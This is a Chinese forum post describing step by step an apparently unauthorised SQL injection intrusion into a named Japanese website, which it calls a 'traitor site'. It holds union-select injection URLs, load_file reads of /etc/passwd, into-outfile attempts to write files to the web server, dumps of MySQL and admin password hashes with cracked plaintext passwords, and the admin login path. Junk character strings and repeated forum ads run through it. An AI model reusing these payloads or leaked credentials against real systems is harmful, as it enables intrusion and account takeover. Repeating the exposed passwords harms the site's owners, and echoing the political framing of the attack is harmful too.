原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

) m) O& o5 v: h9 J
0x01. 检测 www.zuaa.jp 收集数据


# I/ ]: ~# I. m- X8 X5 e4 Y3 F* Rwhatweb

6 s; v/ |+ U# ]
( y7 `/ [4 h7 ^* n# e9 Z利用NMAP扫描

6 X6 ^+ M: ]6 t8 m7 d中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
8 m' }: I' @, `/ X' T0x02.找注入点
5 r$ E  y9 U1 C; @: W找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390
' q( Y" K" S6 L, D6 d, N
$ H& {, y: x6 P% |6 ~
3 C9 R) w3 X8 C$ G. f& ^2 G0x03.order by
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
) i: m5 V3 n3 N/ B5 p# O+ L
1 B8 }5 I% Q4 z3 X; s( torder by 28报错，order by 27正常
5 z# h# I7 d  \8 o8 q: y0 S4 t- i7 C
1 [: Y# B  w* R0x04.   union手动查询
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
添加到 27 时正常显示
1 B! x2 F' X3 t0 T2 G
+ l1 K& }* K( {, f中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

& P7 ]% J% O) s& w: S8 d) J0x05. info:
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

% Q; U% G7 e% m: o& }  B: uuser:            root@localhost
6 J0 v# U$ ^2 Fdatabase:    openpne
version:      4.1.22
% a& J$ Y  ^, Oos:             portbld-freebsd5.4

0x06. root用户
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
2 r6 t  [/ l4 l" b4 ^/ Lhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

通过工具转换

! M7 l- k7 H7 i* b中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
' z) H) @: m( Z( r
0x07. 利用 into outfile
* J3 ?" H( s  A2 e% B6 n! B全部都失败
' {/ v' k$ D: z: B6 Chttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php

http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php

页面显示“MDB2 Error:syntax error”
0 Y+ p) P$ g# {+ D3 S, f5 O
6 G; [7 F3 C7 r0 {3 g0x08. 利用 mysql 4.1
$ s  N" l+ |1 w6 \) ~4 O猜常规表名，字段未果 工具 sqlmap
5 U0 s2 T% J( M* t  R中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
5 f$ b6 E+ h8 |5 Q" b$ Z


0x09. 查找后台
利用 现有的各种 后台工具尝试都不行
  c" N1 f3 m5 K$ ~4 _- I9 G
0x10.  MySL外联方法
从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user

这个可以在 www.cmd5.com 解密
7 S; r( _8 k8 @- j1 ~, Z* Oroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
& R  I, `. G+ l0 w. m1 x  @0 s$ J3 hzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知

* o( q- q; l  i+ o- Y" T- R7 t/ X
0x11. 网站突破
3 m/ q" t& T" {& J发现网站的源程序 openpne, google 下载 openpne 源码
4 D# C* L# J5 f0 Y9 L7 H

" N; K" a; c, j3 s3 l0x12. 默认信息利用
http://sns.zuaa.jp/?m=admin&a=page_login
; ~; ]9 J4 i$ W9 i" F& M
+ E2 f' D$ E/ v# `表名 (c_admin_user) ，字段名（username,password）
0 D9 q2 f4 U! N1 M! N# Z0 I; ehttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user

* x; |& ~) c1 J. e7 X解密
* \- N( S2 A8 K+ e5 v  zzuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
7 f( @; j! Z  p: `9 kzuaajp:c0923ec5857796a393da99905008c176,          zju1897
, G2 A9 |$ A9 ~+ O* E
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

0x13. 登录后台
" r' c" J% l( [5 b  z5 g  [8 D5 ?# X

+ S4 b' ~; Z3 `9 c; ~3 q9 q
/ x, O$ K; K9 L/ i0 I0x14. 小结
利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
: W- Z6 s7 `$ Z5 w: M5 k------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
" V( ]$ a3 g) t) W0 B4 u  H中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
) x/ ^6 @! r# h( F9 J' o8 x0 l" U
最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！
8 y3 k$ N) A, B9 ^6 T* t

荒村狂客

哪个牛人 费的这劲 入侵的